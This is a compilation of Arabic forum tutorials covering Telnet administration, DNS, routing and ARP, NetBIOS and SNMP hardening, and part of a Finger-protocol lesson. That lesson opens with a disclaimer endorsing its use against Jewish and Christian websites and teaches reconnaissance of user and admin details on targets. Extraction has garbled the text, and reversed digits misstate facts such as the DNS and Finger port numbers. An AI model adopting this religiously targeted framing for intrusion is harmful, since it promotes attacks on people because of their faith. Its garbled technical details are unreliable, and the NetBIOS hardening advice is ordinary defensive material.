 ‫أخرى، إذا كنت متصالً بملقم ،)‪ Telnet‬يمكنك الخروج من جلسة عمل ‪ Telnet‬لتعديل المعلمات بضغط‬
                                  ‫‪ .]+CTRL‬للعودة إلى جلسة عمل ‪ ،Telnet‬اضغط ‪.ENTER‬‬



                                                           ‫إدارة ملقم التلنت المحلي بالـ ‪tlntadmn‬‬

                                                                  ‫إلدارة كمبيوتر يشغل ملقم‪Telnet‬‬

                                                                                          ‫بناء الجملة‬

                ‫]‪tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue‬‬

                                                                                            ‫المعلمات‬

                                                                             ‫‪\\RemoteServer‬‬

                ‫تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ً ما، سيتم افتراض الملقم المحلي .‬

                                                                                             ‫‪start‬‬

                                                                          ‫بدء تشغيل ملقم .‪Telnet‬‬

                                                                                             ‫‪stop‬‬

                                                                        ‫إيقاف تشغيل ملقم .‪Telnet‬‬

                                                                                           ‫‪pause‬‬

                                                                              ‫مقاطعة ملقم .‪Telnet‬‬

                                                                                       ‫‪continue‬‬

                                                                             ‫استئناف ملقم .‪Telnet‬‬

                                                                                            ‫مالحظات‬

‫يمكنك إدارة كمبيوتر عن بعد يشغل ملقم ‪ Telnet‬باستخدام األوامر ‪ tlntadmn‬إذا كان كالً من جهازي‬
‫الكمبيوتر يشغالن نفس نظام التشغيل فإذا المطلوب ويندوز2226 استخدمه بي ويندوز 2226. ال يمكنك‬


                                             ‫84‬
 ‫استخدام األوامر ‪tlntadmn‬إلدارة كمبيوتر عن بعد يشغل 0002 ‪ Windows‬وملقم ‪ Telnet‬من‬
                                               ‫كمبيوتر يشغل ‪ Windows XP‬مثالً.‬

                                 ‫لتعيين الحد األقصى لعدد االتصاالت على كمبيوتر يشغل ملقم‪Telnet‬‬

                                                                                          ‫بناء الجملة‬

            ‫]‪tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger‬‬

                                                                                            ‫المعلمات‬

                                                                             ‫‪\\RemoteServer‬‬

                ‫تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ً ما، سيتم افتراض الملقم المحلي .‬

                                                              ‫‪maxconn=PositiveInteger‬‬

 ‫تعيين العدد األعظمي لالتصاالت. يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من 22‬
                                                                                ‫ماليين .‬



              ‫لتعيين العدد األعظمي لمحاوالت تسجيل الدخول الفاشلة على كمبيوتر يشغل ملقم‪Telnet‬‬

                                                                                          ‫بناء الجملة‬

               ‫]‪tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger‬‬

                                                                                            ‫المعلمات‬

                                                                             ‫‪\\RemoteServer‬‬

                 ‫تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ً ما، سيتم افتراض الملقم المحلي.‬

                                                                 ‫‪maxfail=PositiveInteger‬‬

‫تعيين الحد األقصى لمحاوالت تسجيل الدخول الفاشلة المسمو ح بها للمستخدم. يجب عليك تحديد هذا العدد‬
                                                      ‫بواسطة عدد صحيح موجب أصغر من 222 .‬



                         ‫لتعيين المهلة من أجل خمول جلسات العمل على كمبيوتر يشغل ملقم‪Telnet‬‬

                                                                                          ‫بناء الجملة‬

                     ‫]‪tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss‬‬

                                                                                            ‫المعلمات‬

                                                                             ‫‪\\RemoteServer‬‬


                                              ‫94‬
                   ‫تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ً ما، سيتم افتراض الملقم المحلي .‬

                                                                           ‫‪timeout=hh:mm:ss‬‬

                                                      ‫تعيين فترة المهلة بالساعات، والدقائق، والثواني .‬

                                                ‫دائما ً يستخدم الـ ?/ لعرض التعليمات في موجه األوامر..‬

                                              ‫انتهى،،،‬




                           ‫" معلومات عن الـ ‪" DNS‬‬

                                                                            ‫<منقول من منتدى إعصار>‬

                                                                            ‫<الكاتب: ‪> Dark Devil‬‬

                                                                     ‫قبل ان نبدأ دعونا نعقد اتفاق معا :‬
     ‫فلننسا كلمه هكر و لنبدأ فى تعلم االشياء التى توصلنا لكلمه هكر بمعنى الكلمه و طبعا الهكر ليس معنا‬
                                                                 ‫تروجن هورسس او سب سفن..... الخ‬
‫الهكر الحقيقى هو تعلم نظم التشغيل مثل اللينكس و اليونكس و تعلم لغات تصميم المواقع بجانب بعض لغات‬
                                                  ‫البرمجه التى يكون اهمها فى مجالنا هى لغه السى ‪C‬‬
                                            ‫و االن دعونا من كل هذه الخالبيط و لنبدأ التكلم فى المفيد:‬
‫نحن فى بعض االحيان نسمع عن اشياء كثيره و لكن ال نعرف ما هى و ال نحاول ان نكتشف و نعرف ما هى‬
                           ‫و فى هذا الملف سوف نتكلم عن شئ نسمع عنه كثيرا و لكن معظمنا ال يعرف‬
                                                                                                 ‫ما هو:‬
                                                                             ‫و هذا الشئ هو ال:‪DNS‬‬
                     ‫و سوف نبدأ بالتحدث عن هذا االسم الذى يسمعه الكثيرين و لكن ال يعرفون ما هو :‬
                                                                                  ‫و لنبدأ بالسؤال نفسه‬
             ‫==================================================‬

                                                          ‫=========================‬
                                                                          ‫ما هو ال?‪DNS‬‬



                                                 ‫05‬
                                                                                 ‫==============‬
    ‫اوال ‪ : DNS‬هو اختصار لكلمه . ‪ Domain Name System‬و يتصل سرفر ال ‪ DNS‬عادتا على‬
        ‫بورت 35 مما يعنى انك اذا اردت االتصال الى احد المواقع و استعملت ال ‪ DNS‬حقه فسوف تتصل‬
‫به عن طريق البورت 35 و سوف يترجم او يحول ال ‪ translates alphabetical hostnames‬و‬
     ‫يعنى اسم الموقع مثل : /‪ http://www.burn.com‬الى ‪ IP ADRESSES‬مثل 2.2.2.162 و‬
                                                                        ‫العكس صحيح و عندما تتم العمليه‬
                                                                                     ‫تتصل بالموقع مباشره‬
     ‫و عمليه التحويل هذه تسمى ‪ address resolution‬اى تحويل او تحليل عنوان الموقع الى ‪ IP‬او‬
                                                                               ‫العكس لنستطيع االتصال به‬
‫و قبل ظهور ال ‪ DNS‬كان اسم اخر لعمليه ال. ‪ address resolution‬و لكن قد ظهر ال ‪ DNS‬لجعل‬
                                                   ‫توزيع الهوستس اسهل بكثير من الماضى حيث انه من‬
                   ‫السهل ان تتذكر اسم موقع معين تريده افضل من ان تتذكر اربعه خانات من االرقام. )‪(IP‬‬
       ‫و كان االسم المستعمل ل ال ‪ address resolution‬قبل ال ‪ DNS‬كان يتكون من ملف اسمه ال‬
                                          ‫‪HOST FILE‬و كان عباره عن اسماء الهوستس اى المواقع‬
 ‫و عنواوين ال ‪ IP‬الخاصه بهم و كان هذا الملف تتولى رعايته ‪Stanford Research Institute's‬‬
                       ‫.)‪Network Information Center (SRI-NIC‬و كان على هذا الراعى ان‬
 ‫يجدد )‪ (UPDATE‬الجدول هذا حوالى كل اسبوع و يمده بالعنواوين الجديده و االرقام التى ظهرت و على‬
                                                                 ‫السيستم ادمين ان يجدد هو االخر ملفه او‬
                                            ‫عن طريق اتصال ال ‪ FTP‬بينه و بين الراعى اى.‪SRI-NIC‬‬
  ‫و طبعا مع تطور النترنت الرهيب و السريع بدأ هذا النظام فى الفشل و بدأو يبحثون عن النظام االمثل الذى‬
                                                                    ‫يستطيع التحكم فى الهوست و االى بى‬
                             ‫معا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظهر ال ‪ DNS‬ليفعل ذلك.‬
  ‫و ال ‪ DNS‬ليس له مركز اى ‪ decentralized‬اى انه ليس هناك ماكينه او سيستم معين يتحكم فى كل‬
                                                      ‫ال ‪ DNS‬بل بالعكس فال ‪ DNS‬عباره عن داتا بيز‬
‫موزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر عليه ‪ DNS‬يعرف اين يبحث عندما يريد ان‬
                                                               ‫يحصل على معلومه معينه او هوست معين.‬
‫هذا بالنسبه لمعلومات عامه عن ال ‪ DNS‬و كيف كان النظام قبل اكتشافه و هى ايضا نظره عامه عن حركه‬
                                                                                         ‫االنترنت القديمه .‬

                                                                          ‫:‪THE DNS SERVER‬‬
                                                                          ‫================‬
 ‫ال ‪ DNS SERVER‬هو عباره عن كمبيوتر و يعمل عادتا على نظام ‪ UNIX‬او النظم الشبيهه باليونكس‬
   ‫و يستخدم برنامج اليونكس ‪ BIND‬اى .)‪ (Berkeley Internet Name Domain‬و يوجد ايضا‬
                                                              ‫برامج مثل هذه للويندوز و الماكنتوش ايضا‬
                              ‫اذا اراد احد استعمالهم ك ‪ DNS SERVER‬و لكن الكل يفضل ال. ‪UNIX‬‬
                                                                 ‫و يتكون برنامج ال ‪ DNS‬من جزئين :‬
‫)35 ‪the name server itself (the daemon program that listens to port‬و االخر‬
                                                                                ‫يسمى‪RESOLVER‬‬
       ‫و ال ‪ NAME SERVER‬هذا يستجيب الى متصفحك عندما تطلب معلومه معينه فمثال عندما تفتح‬
                                                ‫االنترنت اكسبلورر و تكتب او تطلب منه موقه معين مثل‬
      ‫/‪http://www.burn.com‬فسيسئل المتصفح اقرب ‪ DNS‬موجود له (و هذا يعتمد على اتصالك‬
                  ‫بالشبكه و رقم االى بى الخاص بك) عن عنوان ال ‪ IP‬ل/‪http://www.burn.com‬‬
‫الن المتصفح يحتاج هذا ال ‪ IP‬ليجد السرفر الذى لديه هذا الهوست اى هذا الموقع و يطلب محتويات الموقع‬
                                                                   ‫من السرفر ليعرضها لك فى متصفحك.‬
  ‫و قبل هذا سيسئل ال ‪ daemon program‬فى جداوله اى فى ذاكره متصفحك عن الموقع الذى تطلبه‬
                                               ‫فأذا لم يجده ينتقل الى ما سبق شرحه و هكذا تتم العمليه.‬

                                                         ‫:‪THE TREE INFORMATION‬‬
                                                        ‫======================‬
‫و االن اصدقائى بعد ان اتقفنا على انك عندما تطلب رقم ‪ IP‬معين من المتصفح حقك و ال يجده فى ال ‪DNS‬‬


                                                   ‫15‬
‫المحلى اى الخاص بك سوف يسأل ال ‪ DNS SERVER‬االعلى منه فى المستوى عنه ليجده و اذا لم يجده‬
         ‫فى مستوى اعلى فينتقل للبحث فى مستوى اعلى و اعلى و هكذا يسير البحث من االقل الى االعلى فى‬
                                                                     ‫مستويات ال.‪DNS SERVERS‬‬
             ‫و طبعا نتيجه من هذا االتصال فنستنتج وجود شجره اتصال و معلومات و لكن كيف تعمل بالضبط‬
                                                                                      ‫دعونا نأخذ مثال :‬
       ‫لو فرضنا ان ال ‪ ISP‬الخاص بك كان مثال ‪ isp.co.uk‬و هذا يعتمد على اتصالك باالنترنت اى حسب‬
               ‫الشركه و السرفر الذى تشبك عليه فمن الطبيعى طبعا ان يكون ال ‪ISP's DNS server's‬‬
    ‫‪hostname‬مثل هذا ‪ dns.isp.co.uk‬و االن فالنفرض انك سألت هذا ال ‪ DNS‬ليبحث لك عن ‪IP‬‬
      ‫الخاص ب /‪ http://www.burn.com‬مثال فسيقوم هذا ال ‪ dns.isp.co.uk‬بالبحث فى جداوله‬
     ‫المحليه المخذنه فى الذاكره عنده فيجدها و اذا لم يجدها فسينتقل كما قلنا الى مستوى اعلى من ال ‪DNS‬‬
 ‫‪SERVER‬ليبحث فيه و اذا لم يجده ايضا فى المستوى االعلى فعليه ان يقوم بتغيير مكان البحث كليا فمثال‬
                ‫من ‪ dns.isp.co.uk‬الى ‪ some-organization.org.uk‬او ,‪school.edu.uk‬‬
‫‪university.ac.uk, england.gov.uk, airforce.mil.uk‬و الخ و هناك امثله كثيرا طبعا و كل‬
       ‫شئ ينتهى ب ‪ UK‬و اذا لم يجده ايضا فى كل االماكن المتا ح له البحث فيها فسيرجع المتصفح الى اكبر‬
         ‫‪DNS‬موجود على الشبكه و اسمه ال ‪ ROOT‬فهو يحتوى على كل عناوين ال ‪ IP‬على كل للمواقع‬
                                                                ‫الموجوده على اى.‪DOMAIN NAME‬‬

                                             ‫?‪When and why does DNS "hang" or fail‬‬
                                    ‫======================================‬
 ‫و يمكن ايضا لل ‪ DNS‬ان يكون بطئ او سريع .اذا كان ال ‪ ISP‬الخاص بك يحنوى على ال ‪ IP‬الذى طلبته‬
   ‫فسوف يحتاج فقط الى اجزاء من الثانيه ليأتى به لك و يعرضه فى متصفحك. اما اذا انتقل المتصفح للبحث‬
    ‫فى مستوى اعلى من ال ‪ DNS‬فسوف يحتاج الى قليال من الوقت يمتد حتى 52 ثانيه . و فى حاله انه ال‬
    ‫يجده سوف تأتيك رساله من متصفحك تقول ‪ address could not be found‬و هذا يحدث نتيجه‬
   ‫اعطاء المتصفح ‪ HOST‬او ‪ IP‬خطأ ليبحث عنه و بالتالى طبعا فهو ليس موجود من االساس ليعرضه او‬
                ‫نتيجه طول البحث فيقوم متصفحك بقدان االتصال مع ال ‪ DNS‬اى عمليه. ‪TIMED OUT‬‬
           ‫و فى هذه الحاله نضغط فى المتصفح على ‪ REFRESH‬او ‪ RELOAD‬طبعا حسب متصفحك .‬


   ‫ارجو ان اكون قد افدتكم جميعا بهذه المعلومات التى هى بعيده عن الهكر و لكنها اساس فى تعلم الهكر يا‬
   ‫اصدقائى و كما قلت لكم الهكر ليس التروجان و الباتشات الهكر هو تعلم اساليب البرمجه و كيفيه تصميم‬
‫المواقع و معرفه كل شئ جديد فى عالم االنترنت و ارجو من المحترفين الدخول و قرائه الموضوع و تصحيح‬
        ‫االخطاء التى به حتى يكون موضوع كامل و متكامل خالى من االخطاء و نتظر ردودكم و تفاعلكم مع‬
                                                    ‫المعلومات و اى سؤال انا موجود على قد مقدرتى‬
                       ‫و انتظرو موضوعى القادم و هو معلومات عن ال ‪ SSL‬و سنعرف ما هو بالتفصيل‬
                                                                ‫و السالم عليكم و رحمه هللا و بركاته.‬

                                               ‫انتهى،،،‬




                                                 ‫25‬
           ‫" معلومات عن ‪" Routing in the Internet‬‬

                                                                   ‫<منقول من منتدى إعصار>‬

                                                                   ‫<الكاتب: ‪> Dark Devil‬‬

                                                           ‫السالم عليكم و رحمه هللا و بركاته:‬
‫سوف نتكلم يا اصدقائى عن شئ مهم فى علم الشبكات و الكثير منكم على غير علم به و هذا الشئ هو‬
                                                                               ‫ال .‪Routing‬‬
                               ‫و االن دعونا نبدأ و اتمنى ان يعجبكم الموضوع و تستفيدون منه:‬
                                                           ‫:‪Routing in the Internet‬‬
                                                 ‫=========================‬
                                                                    ‫!?‪what is routing‬‬
‫الروتنج هو عباره عن تكنيك او ميكانزم الذى عن طريقه تنتقل المعلومات من كمبيوتر الى اخر او من‬
                                                                              ‫هوست الى اخر.‬
                                        ‫و فى سياق االنترنت يوجد ثالث مظاهر من الروتنج وهم:‬
                                             ‫‪1-Physical Address Determination‬‬

                                        ‫‪2-Selection of inter-network gateways‬‬

                                          ‫‪3-Symbolic and Numeric Addresses‬‬



                                         ‫35‬
   ‫و يعتبر االول فى هذه االشياء هو المهم عندما تنتقل داتا ال ‪ip‬من الكمبيوتر.فمن الدرورى ان نغلف هذه‬
 ‫الداتا الخاصه بال ‪ip‬بأى أطار من اى صيغه تكون متصله بالنت ورك المحليه للجهاز او بالنت ورك المتصل‬
 ‫بها الجهاز فى حالته الموجود عليها عند انتقال هذه الداتا.و يتطلب هذا الغالف التضمين من ال عنوان النت‬
    ‫ورك المحليه او العنوان الفيزيائى لهذا للشبكه مع االطار الذى يحيط بالبيانات اى ‪(inclusion of a‬‬
               ‫.)‪local network address or physical address within the frame‬‬

 ‫و الشئ الثانى من المذكور اعاله مهم ايضا و درورى الن االنترنت تتكون من عدد من النت وركس المحليه‬
   ‫اى ‪ local networks‬مربوطه بواحد او كثير من المداخل اى ال.‪gateways‬و هذه المداخل عموما‬
 ‫تسمى بالروترس اى ال, ‪routers‬احيانا يكون لها اتصاالت فيزيائيه او بورتات مع الكثير من النت وركس‬
   ‫.و تحديد المدخل المالئم و البورت لتفصيل داتا ال ‪ip‬هذا ما نسميه روتنج اى ‪ routing‬و تتضمن ايضا‬
                                                                  ‫داخل تبادل المعلومات بطرق معينه.‬

  ‫و الثالث من المذكور هو الذى يتضمن انتقال العنوان اى ال ‪address translation‬من الشكل الكتابى‬
                       ‫الذى نعرفه و نستطيع التعرف عليه بسهوله و المقصود مثال عنوان المتصفح اى‬
‫/‪http://www.burn.com‬الى ‪ ip‬اى الى اشياء رقميه معقده صعبه و تؤدى هذه المهمه عن طريق ال‬
                                ‫( ‪DNS‬ارجو مراجعه موضوعى االول عن ال ‪DNS‬لالستفاده اكثر ).‬

                                    ‫و االن ندخل فى شر ح عمليه تحديد ال ‪Physical Address‬اى :‬
                                                      ‫:‪Physical Address Determination‬‬
                                                ‫===============================‬
 ‫اذا كان يريد جهاز كمبيوتر ان ينقل ‪ ip data‬اذن فأنه يحتاج الى ان يغلف بأطار مخصص و تابع للنتورك‬
       ‫المتصل الجهاز بها. و لنجا ح هذا االنتقال فى ظل الغليف بهذا االطار من الدرورى ان نحدد ما يسمى‬
 ‫بال ‪physical address‬ألتجاه الكمبيوتر. و هذا يتم بنجا ح و ببساطه عن طريق استخدام جدول سوف‬
 ‫يوضح كيفيه تحويل ال ‪ip‬الى , ‪ physical addresses‬فمثال هذا الجدول يحتوى على عناوين ال ‪ip‬‬
                                                         ‫للنتوركس و االدرس او العنوان المعروف لها .‬
‫و للحصول على هذا الجدول و قرائته من الطبيعى ان يكون الكمبيوتر يستخدم بروتوكول معين للحصول على‬
     ‫هذا الجدول و تحويل ال ‪ip‬الى ‪ physical addresses‬و هذا البروتوكول يعرف بأسم ‪ ARP‬اى‬
  ‫‪Address Resolution Protocol‬اى بروتوكول تحليل االدرس و اعتقد اننا االن ادركنا و فهمنا‬
     ‫معنى كلمه تحويل ال ‪ip‬الى , ‪ physical addresses‬و يمكن ان نعرف هذا الجدول بأسم ‪ARP‬‬
                                                                                         ‫. ‪cache‬‬

                   ‫و للحصول على الجدول نستخدم امر ‪ arp -a‬و فى اليونكس ايضا نستخدم نفس االمر.‬
                                   ‫و هذا مثال حى من جهازى على الجدول الذى يظهر بعد تنفيذ االمر :‬
                                                                      ‫‪C:\WINDOWS>arp -a‬‬

                                             ‫2‪Interface: 62.135.9.102 on Interface 0x‬‬
                                           ‫‪Internet Address Physical Address Type‬‬
                                           ‫‪207.46.226.17 20-53-52-43-00-00 dynamic‬‬
                                            ‫‪213.131.64.2 20-53-52-43-00-00 dynamic‬‬
                                          ‫‪213.131.65.238 20-53-52-43-00-00 dynamic‬‬

     ‫االنترنت ادرس الموجود امامكم هذا هى عناوين كل الشبكات المتصله بجهازى بعد دخولى الى االنترنت‬
‫و ال ‪Physical Address‬اعتقد انكم تالحظون انه ثابت ال يتغير و بهذا يمكننا ان نقول و نوضح لكم ان‬
 ‫ال ‪Physical Address‬هذا هو ال ‪ Mac Address‬اى رقم الجهاز نفسه الذى تتصل به النتوركس‬
      ‫اثناء العمل و لذلك فقد قلت فى كالمى ان تحديد ال ‪ Physical Address‬مهم جدااا فى عمليه نقل‬
   ‫معلومات او داتا ال ‪ip‬النه بدون ‪ Physical Address‬اذن فكيف ستتعرف الباكيدجس الموجوده فى‬
                                                                              ‫ال ‪router‬على طريقها.‬
    ‫و ال ‪ type‬هذا مكتوب ‪ dynamic‬اى انه غير ثابت بمعنى انه يتغيير عند عمل ريستارت لكل مره فى‬
                                                         ‫الجهاز و لكنه يثبت اثناء العمل على االنترنت .‬
                        ‫و هناك النوع االخر و هو ال ‪static‬اى الثابت الذى ال يتغير "هذا فقط للتوضيح"‬


                                                 ‫45‬
                                      ‫اعتقد االن اننا فهمنا بمعنى بسيط ما هو الروتنج و ما هى ال‪routers‬‬

                                                    ‫انتهى،،،‬




                                           ‫" ‪" NETBIOS‬‬

                                                                                        ‫<منقول من موقع نورة>‬

                                                                         ‫بعد قراءة هذا الموضوع ستكون قادر على‬

                                                                                 ‫صد الجلسات الخالية‬     ‫‪‬‬
                                                                                ‫منع تعداد المستخدمين‬    ‫‪‬‬
                                                                                ‫منع تعداد الـ ‪SNMP‬‬      ‫‪‬‬

            ‫يوجد في اإلعداد االفتراضي للويندوز اعتماد على ‪ NetBIOS‬وهي مشكلة كبيرة ألصحاب الشبكات المهمة ألن‬
       ‫الـ ‪NetBIOS‬لها واجهات تداخل ‪ API‬تعيد وترجع معلومات حول الهدف من خالل المنفذ 931 لـ ، ‪TCP‬وفي الحالة‬
      ‫االفتراضية يكون الوصول ممكن حتى من مجهولين الهوية ، وطبعا هذا يكون فيه خطراً قد يكون كبير عند استخدامه من‬
                                                                                   ‫محترفين الولوج على أنظمة‪NT‬‬
    ‫تستطيع أن تلغي كل خدمات ‪ NetBIOS‬على جهاز ما عندما تجد أنها غير ظرورية لك ويكون ذلك من خصائص ‪ TCP/IP‬ثم من‬
                                        ‫‪Advanced‬ثم من التبويب ‪ WINS‬ثم تعلم على الخيار الواضح في المثال التالي‬




‫وإذا كانت هذه الخدمة مهمة لك فقد قدمت شركة مايكروسوفت حالً مناسباً وهى تدعى ‪ RestrictAnonymous‬وهي تحد بشكل كبير‬



                                                      ‫55‬
         ‫من تسرب المعلومات عبر الوصالت المجهولة ، وتستطيع الوصول إليها من ‪ Administrative TOOLS‬ثم من ‪Local‬‬
      ‫‪Security policy‬ثم من النافذة نختار ‪Local poicies‬ثم من ‪ security options‬ثم نعلم على الخيار األول ‪Additional‬‬
‫‪restrictions for anonymous connections‬ثم بالزر االيمن نختار ‪ security‬ثم من النافذة نختار من الشريط المنزلق الخيار‬
                                               ‫‪No Access Without Explicit Anonymous Permissions‬مثل المثال‬




                                                                                   ‫بعض األمثله إلستخدام أدوات الـ‪NetBIOS‬‬

                                                                                                      ‫‪Net View‬‬        ‫‪‬‬

‫هذه األداة مضمنه ضمن نظام التشغيل نفسه وهي أداة سطر اوامر على 0002‪ NT/W‬وهي تعرض الميادين المتاحة وكل االجهزة على‬
  ‫هذه الميادين وكل الخدمات المتاحة لتشارك على األجهزة ، ويكفي أن تكتب عنوان ‪ IP‬أو اسم الدومين حتى تكون قد حصلت على ما‬
                                                                                                                 ‫تريد‬




‫ولمعرفة المزيد عن إستخدامات األمر ‪ Net‬في إدارة‬
                                                                                                                ‫الشبكة انقر .‬

‫وتوجد بعض األدوات المتاحة على االنترنت تقوم بنفس العمل بشكل احترافي منها هذه األداة المدعوه ‪ Nbtscan‬وهي أيضا ً اداة سطر‬
                                                                                           ‫أوامر وتستطيع أن تحملها من ...‬

                                                                                                 ‫ولمشاهدة شرح ميسر من ...‬

                   ‫وتوجد أدوات رسومية شعبية كثيرة على االنترنت للقيام بنفس العمل منها على سبيل المثال البرنامج ، ‪Legion‬‬




                                                                                                      ‫الحل المريح‬     ‫‪‬‬

 ‫الحل المريح لتخلص من هذا الصداع هو حماية المنافذ المقدمه من البروتوكول ‪ TCP‬و البروتوكول ‪ UDP‬عبر المنافذ من 531 إلى‬
   ‫المنفذ 931 +544 ، وكل برامج الجدران النارية المتقدمة تستطيع من خاللها أن تتحكم بالمنافذ بشكل مريح ، وشاهدنا كيف نلغي‬
 ‫الخدمة ‪ NetBIOS‬أو نقلل من المشاكل المحتمله منها ، ورغم كل ذلك الزال الخطر موجوداً إذا كنت تستخدم البروتوكول ‪SNMP‬‬
     ‫إلدارة الشبكة على ويندوز 1112 سيرفر ، فهذا البروتوكول يمرر كل المعلومات المطلوبة إذا كان مثبتا ، ولتأمين هذا البروتوكول‬
                                                                                            ‫بالشكل المطلوب أمامك خيارين االول‬



                                                         ‫65‬
      ‫حذف اسم المجموعة ‪ Public‬التي تكون عند التثبيت االفتراضي وتكون أسماء مخصصة من مستخدمين الشبكة كما في المثال‬
                    ‫المجموعة ‪ public‬موجودة علم عليها ثم من الزر ‪ Remove‬ثم حرر المربع ‪Send authentication trap‬‬




                                                      ‫بذلك تكون قد حصرت استخدام هذا البروتوكول لألشخاص المختارين فقط‬

                                                                                    ‫والحل الثاني من محرر السجل ‪regedit‬‬

‫‪HKEY_LOCAL_MACHINE\system\currentControlset\serveces\SNMP\parameters\ExtensionAgent‬‬

 ‫ثم قم بحذف المفتاح ‪ LANManagerMIB2Agent‬ثم قم بإعادة ترقيم المدخالت مثالً إ ذا كان ما حذفته رقمه = واحد أعد الترقيم‬
                                                                                            ‫ليبدأ من واحد للمدخل رقم 2‬

 ‫البروتوكول ‪ TCP/IP‬يستطيع العمل بشكل سليم بدون خدمات الـ ، ‪NetBIOS‬لذلك إذا كنت‬
                                                                                        ‫هل تعلم أن‬
                                                       ‫غير محتاج إليه تعطيله أفضل‬


                                                    ‫انتهى،،،‬




                                                       ‫75‬
                           ‫" بروتوكول خدمة ‪"Finger‬‬

                                                            ‫<منقول من منتديات شبكة الحزم اإلسالمية>‬

                                                                                ‫<الكاتب:‪> LAMeR‬‬

                                                           ‫السالم عليكم ورحمة هللا وبركاته‬
             ‫اتمنى انكم تتقبلون مني هذا الدرس عن بروتوكول خدمة ‪ Finger‬التي تعمل على بورت97‬

                                                                                   ‫بسم هللا نبدأ الدرس‬

                                                                           ‫فهرس محتويات الدرس‬
                                                                      ‫>================<‬

                                                                                      ‫1.1تبرئة‬
                                                                         ‫2.1مقدمة عن‪Finger‬‬
                                                                           ‫3.1استخدام‪Finger‬‬
                                                        ‫4.1بعض الخدع عند استخدام خدمة‪Finger‬‬
                                                     ‫5.1األستعالم عن طريق موقع بأستخدام‪Finger‬‬
                                                                     ‫6.1األستنتاج من هذا الدرس‬
                                                                                     ‫7.1الختام‬



                                                                                       ‫1.1تبرئة:‬
                                                                              ‫>=========<‬
                         ‫هذا الدرس فقط للتعليم والتطبيق على مواقع اليهود والنصاري الضاره للمسلمين‬
                      ‫فالكاتب ال يتحمل اي مسؤولية لالستخدام السيء لهذا الدرس ضد أخواننا المسلمين.‬

                                                                    ‫2.1مقدمة عن‪Finger‬‬
                                                          ‫>===================<‬
                                 ‫إن ‪ Finger‬ديمون خدمة تعمل عن طريق البورت 81 عادة وكانت‬
                                           ‫مستخدمة أصال كنوع ‪ businesscard‬رقمي للناس.‬
     ‫المستخدم البعيد ) ‪(remote user‬يمكن أن يرسل طلب إلى ‪ Finger‬ديمون يجري على نظام معين‬
                                              ‫(بورت ‪ Finger‬نوعية 81) وسيحصل على إجابة.‬

                                        ‫هذه اإلجابة ستخبرك من هم المستخدمين على هذا النظام و أيضا‬
                                             ‫بعض المعلومات عن هؤالء المستخدمين المتصلين بالنظام.‬

‫إضافة إلى هذه المعلومات, في أغلب األحيان اإلجابة تخبرك أيضا من الذي يدير النظام )‪(admin‬وكيف قام‬
                                                                                             ‫باإلتصال.‬
     ‫قديما استخدم الناس األتصال على جميع انواع األنظمة في العالم وطلب األستعالم عن هذه األنظمة و الـ‬
                                                                    ‫‪Finger‬كان يعطيهم معلومات عن‬
             ‫من هم الموجودون في النظام وهل لهم حسابات في هذا النظام.وكان ‪Finger‬يستخدم قديما في‬
                                                                     ‫الجامعات و الشركات الكبيرة أيضا.‬


                                                ‫85‬
                           ‫في الماضي ، الـ ‪ Finger‬إستعمل عامة عن طريق الطالب في الجامعات‬
                                         ‫اذا ارادوا معلومات تخص طالب اخرين في نفس الجامعه‬
  ‫وكثيرا ما تكون األجابة (اجابة ) ‪ Finger Deamon‬بجملة " !‪ " Finger me‬اي "أعلمني ! "‬
                                       ‫أما اآلن ومع وجود شبكة اإلنترنت العالمية اصبح‪Finger‬‬
                                                                  ‫أقل شهرة ، ألنه توجد اآلن‬
‫مواقع الويب للعمل كبطاقة عمل )‪(bisinesscard‬رقمية خاصة بمستخدمين األنترنت وبسبب مالحظة‬
                                                                                      ‫الناس‬
                          ‫التهديد الواسع لألمن األلكتروني قل استخدام خدمة‪Finger Deamon‬‬

                                                                                  ‫على أية حال،‬
                ‫ليس كل األنظمة منعت هذه الخدمة وستجد بعض المواقع ( األنظمة) تقدم هذه الخدمة.‬
                                  ‫وهذه األيام يقوم الهكرز بمحاوالت اختراق األنظمة بأستخدام برامج‬
                          ‫‪portscans‬للبحث عن البورتات المفتوحة. . . بدون أي أساس علمي .‬
                                                      ‫لذلك إن ‪ Finger‬ديمون، مثال عظيم لخدمة‬
                              ‫يمكن استخدامها قانونيا لتزودك بكمية ضخمة من المعلومات الحساسة‬
                                                                                     ‫حول هدف.‬
                                            ‫لهذا سوف أحاول ان اشر ح في هذا الدرس بلغة مفهومة‬
                             ‫ما هو ‪ Finger‬ديمون وماذا يفعل وكيف يمكن استخدامه في مصلحتك‬

               ‫الخالصة المقدمة: ان خدمة ‪ Finger‬كانت قديما والزالت تستخدم لجلب المعلومات عن‬
                        ‫المستخدمين الموجودين في النظام و هل لديهم حسابات في هذا النظام ام ال.‬

‫مالحظة : النظام ) ‪( server‬هو جهاز كمبيوتر تخزن فيه معلومات هائلة ويستخدم في استضافة المواقع‬

                                                                      ‫3.1استخدام‪Finger‬‬
                                                               ‫>=================<‬

                        ‫عند استخدام اي من برامج السكان المعروفة مثل ) ‪ (superscan‬للبحث‬
  ‫في موقع معين (مثال ) /‪ http://www.foobar.com‬ووجدت به منفذ ‪ (Port‬بورت) 81 مفتوحا‬
                                              ‫هذا يعني ان/‪http://www.foobar.com‬‬
                                                               ‫له ‪ Finger‬ديمون يعمل.‬
                                               ‫اآلن كيف نقوم بـ )‪(request‬طلب استعالم؟‬
                                                                        ‫عن طريق وندوز‬
        ‫في أغلب األحيان وندوز ال يوجدبه زبون )‪ (client‬خاص للـ ‪ Finger‬مركب ) ‪( installed‬‬

                                                  ‫لذلك سوف نستخدم ‪ Telnet‬كخادم لـ ‪Finger‬‬

                                                                    ‫--توضيح--‬
           ‫‪Telnet(client) --------request-------> Finger Deamon(in Server) o‬‬

                                    ‫عن طريق كتابة السطر اآلتي في موجة الدوس: ) ‪(MS DOS‬‬

                                                  ‫97 /‪telnet http://www.foobar.com‬‬

                                          ‫بعد ذلك سيظهر لك برنامج ‪ telnet‬و منه تطبع األوامر .‬

                                                                          ‫اما من يونيكس‬
